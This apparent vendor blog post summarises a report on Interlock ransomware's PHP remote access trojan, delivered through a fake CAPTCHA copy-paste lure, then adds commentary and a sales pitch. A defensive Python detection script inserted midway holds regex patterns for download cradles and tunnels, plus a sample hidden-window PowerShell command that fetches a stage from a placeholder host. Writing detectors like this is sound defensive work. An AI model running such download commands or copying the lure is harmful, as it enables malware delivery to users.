How Interlock Ransomware Gang’s New RAT Slips Through the Cracks


A recent investigation in the DFIR Report uncovered a new version of the Interlock Remote Access Trojan (RAT), used by the ransomware group known as Interlock or NodeSnake. This updated version is written in PHP instead of JavaScript or Node.js, making it stealthier and more evasive against security tools.
The infection starts when a user visits a website compromised by the attackers. The site appears normal but contains hidden code that displays a fake CAPTCHA. After clicking the prompt, the user is tricked into copying and pasting a Windows Run command.
This command executes a PowerShell script that silently downloads and installs the PHP-based RAT. This new infection method, dubbed “FileFix,” disguises the command as a file path in File Explorer, avoiding the usual visual clues that something suspicious is happening.
Once installed, the RAT collects detailed information about the system, including running processes, installed services, hardware details, available drives, and whether the user has administrative access.
All this data is sent back to the attacker in a structured format. To maintain access, the malware stores a hidden script in the Windows Registry that ensures it runs every time the system starts.
The RAT maintains contact with the attackers using Cloudflare Tunnel, a service that makes it harder to trace their location. It also includes fallback IP addresses in case the tunnel is blocked.
From there, the attacker can issue commands to run programs, install new payloads, move across the victim’s network using Remote Desktop Protocol, or shut down the malware entirely. This campaign shows a high level of sophistication and ongoing development.
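A defender-side illustration of the chain summarised above, added here as an example (it is not code from the DFIR Report or from Halcyon): a small Python triage routine that scores constructed Sysmon-style process-creation events for the features the post describes, namely a PowerShell child of explorer.exe carrying a hidden-window download command, a PHP interpreter started by that shell, a Run-key reference for startup persistence, and a Cloudflare Tunnel endpoint. The parent/child pairing, the regular expressions and the weights are assumptions for this example, not indicators published with the report.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str    # parent image name, e.g. "explorer.exe"
    image: str     # child image name
    cmdline: str   # full command line as logged

SHELLS = {"powershell.exe", "pwsh.exe"}
# Heuristic patterns assumed for this example; not indicators from the report.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
RUNKEY_RE = re.compile(r"currentversion\\run\b", re.I)
TUNNEL_RE = re.compile(r"trycloudflare\.com|cloudflared", re.I)

def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Weight each matching heuristic; return (total score, reasons)."""
    parent, img, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline
    hits = []
    if parent == "explorer.exe" and img in SHELLS:
        hits.append((1, "shell spawned from explorer.exe (Run box / address-bar paste)"))
    if img in SHELLS and HIDDEN_RE.search(cmd):
        hits.append((1, "hidden window requested"))
    if img in SHELLS and DOWNLOAD_RE.search(cmd):
        hits.append((1, "download cradle in command line"))
    if RUNKEY_RE.search(cmd):
        hits.append((1, "Run key referenced (startup persistence)"))
    if img == "php.exe" and parent in SHELLS:
        hits.append((2, "php.exe started by PowerShell (script-interpreter payload)"))
    if TUNNEL_RE.search(cmd):
        hits.append((2, "Cloudflare Tunnel endpoint referenced"))
    return sum(w for w, _ in hits), [r for _, r in hits]

def triage(events, threshold=2):
    """Return (image, score, reasons) for events at or above threshold."""
    out = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            out.append((ev.image, score, reasons))
    return out

# Constructed sample events for the demo (not captured from a real incident).
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell.exe -w hidden -c "iwr http://example.invalid/stage -OutFile $env:TEMP\\s.ps1"'),
    ProcEvent("powershell.exe", "php.exe", r"php.exe C:\Users\Public\client.php"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe"),   # user opening a console by hand
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for image, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{image}: score={score} reasons={reasons}")
```

A single weak hit, such as a user opening PowerShell from Explorer by hand, stays below the threshold; the weights are a starting point to tune against your own telemetry.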
Takeaway: Interlock is playing from the same playbook that’s made groups like Scattered Spider so dangerous: custom tooling paired with high-impact social engineering. And that combo is wrecking even the most hardened environments. This isn’t just about clever malware, it’s about how that malware gets in the door.
Interlock’s using fake CAPTCHAs and clipboard tricks to walk users straight into infection. No exploit required, no phishing email even, just a hijacked website and a prompt that convinces someone to copy-paste their own compromise. That’s not a vulnerability in the OS, that’s a vulnerability in human trust.
We’ve seen this before. Scattered Spider perfected the art of voice phishing (vishing) to socially engineer help desks into resetting MFA. They’ve impersonated IT staff, spoofed internal numbers, and even spun up fake Okta login pages on the fly. All of it was designed to bypass strong identity and access controls, not with code but with confidence.
Interlock’s new campaign feels like a scaled-down, automation-ready version of the same approach. They’re investing in custom payloads like a PHP-based RAT and pairing them with attack chains that rely on misdirection, not malware alone. That’s what keeps getting past layered defenses: not a zero-day, but a zero-blink moment where a human makes the wrong decision.
The lesson? When you combine social engineering backed by modular, stealthy, purpose-built tooling, the attacker’s ROI shoots through the roof. This is the new ransomware playbook. It’s not just about breaking in, it’s about blending in, sticking around, and pulling the strings while no one’s looking.
EPP/EDR/XDR do a fantastic job at catching the bulk of commodity threats, known malware, and noisy behavior. They’re essential. But ransomware operators aren’t playing by those rules anymore. They’re not tossing out generic payloads and hoping for the best. They’re crafting attacks designed to sidestep those exact defenses.
Whether it’s abusing living off the land binaries, injecting through legitimate tools, or tricking users into launching the malware themselves, attackers are slipping through cracks that traditional detection logic just doesn’t catch. That’s the gap.
There’s a missing layer between initial access and full-blown compromise. If defenders don’t fill that space with purpose-built anti-ransomware and anti-exfiltration tech, attackers will keep exploiting it. The stack’s not broken, but it’s incomplete.
Halcyon eliminates the business impact of ransomware. Modern enterprises rely on Halcyon to prevent ransomware attacks, eradicating cybercriminals’ ability to encrypt systems, steal data, and extort companies – talk to a Halcyon expert today to find out more, and check out our quarterly RaaS and extortion group reference guide, Power Rankings: Ransomware Malicious Quartile.